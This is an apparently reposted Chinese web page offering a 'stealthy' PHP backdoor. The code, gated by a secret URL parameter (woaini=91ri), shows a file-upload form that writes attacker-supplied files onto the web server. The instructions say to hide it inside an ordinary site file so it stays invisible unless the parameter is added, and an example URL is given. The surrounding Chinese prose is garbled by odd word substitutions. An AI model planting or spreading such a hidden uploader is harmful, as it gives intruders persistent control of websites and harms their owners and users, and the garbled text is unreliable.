|
|
|
联系客服020-83701501

极隐蔽的php小马一枚

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
极埋伏的php小马一枚

Default
12 <?phpif($_GET["woaini"]=="91ri"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?><form method="post" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php }?>

将以上代码插入畸形文件中,间接访问该文件无任何调换但在文件起头加之?woaini=91ri便可显示出小马(间接上传文件的那种)

例如:http://www.91ri.org/ index.php?woaini=91ri

图我就不截了 我信任本人看例子就能够晓畅

link:http://blog.weili.me/blog/article.asp?id=119

本文由网络平安攻防研讨室(www.91ri.org)静态平安小组收集整理,转载请阐明来由!

数安新闻+更多

证书相关+更多